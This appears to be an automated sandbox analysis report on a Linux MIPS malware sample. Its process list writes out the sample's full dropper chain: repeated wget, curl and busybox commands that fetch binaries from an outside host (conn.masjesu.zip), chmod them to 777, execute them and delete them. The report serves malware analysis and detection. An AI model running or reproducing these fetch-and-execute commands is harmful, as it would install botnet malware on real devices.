Analysis Overview
SHA256
a279a94b5c67b7b8511602a9cd6d48ac01390cf0e9106a54aec25105fa047a3f
Threat Level: Shows suspicious behavior
The file 2ff1df07dd78aa9278e2d61cf1ad8b8e.bin was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-29 01:06
Signatures
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-29 01:06
Reported
2024-10-29 01:09
Platform
debian9-mipsel-20240611-en
Max time kernel
83s
Max time network
86s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | N/A |
| N/A | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | N/A |
| N/A | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | N/A |
| N/A | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | N/A |
| N/A | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | N/A |
| N/A | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | N/A |
| N/A | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | N/A |
| N/A | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | N/A |
| N/A | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | N/A |
| N/A | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | N/A |
| N/A | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | N/A |
| N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | N/A |
| N/A | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | N/A |
| N/A | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | N/A |
| N/A | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | N/A |
| N/A | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | N/A |
| N/A | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | N/A |
| N/A | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | N/A |
| N/A | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | N/A |
| N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | N/A |
| N/A | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | N/A |
| N/A | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | N/A |
| N/A | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | N/A |
| N/A | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | N/A |
| N/A | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | N/A |
| N/A | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /usr/bin/curl | N/A |
Processes
/tmp/99985a1d9b11bcf965a5a730b18bad194bf5c5c357a5f2c2e2e8f554bb5df4db.sh
[/tmp/99985a1d9b11bcf965a5a730b18bad194bf5c5c357a5f2c2e2e8f554bb5df4db.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/chmod
[chmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
[./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/rm
[rm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/chmod
[chmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7
[./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/rm
[rm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/chmod
[chmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP
[./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/rm
[rm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/chmod
[chmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM
[./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/rm
[rm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/chmod
[chmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9
[./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/rm
[rm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/chmod
[chmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W
[./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/rm
[rm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/chmod
[chmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p
[./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/rm
[rm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/chmod
[chmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm
[./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/rm
[rm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/chmod
[chmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5
[./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/rm
[rm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/chmod
[chmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU
[./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/rm
[rm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/chmod
[chmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf
[./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/rm
[rm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/chmod
[chmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO
[./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/rm
[rm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/chmod
[chmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm
[./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/rm
[rm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/chmod
[chmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX
[./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/rm
[rm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/chmod
[chmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W
[./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/rm
[rm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/chmod
[chmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9
[./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/rm
[rm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/chmod
[chmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm
[./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/rm
[rm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/chmod
[chmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5
[./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/rm
[rm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/chmod
[chmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU
[./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/rm
[rm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
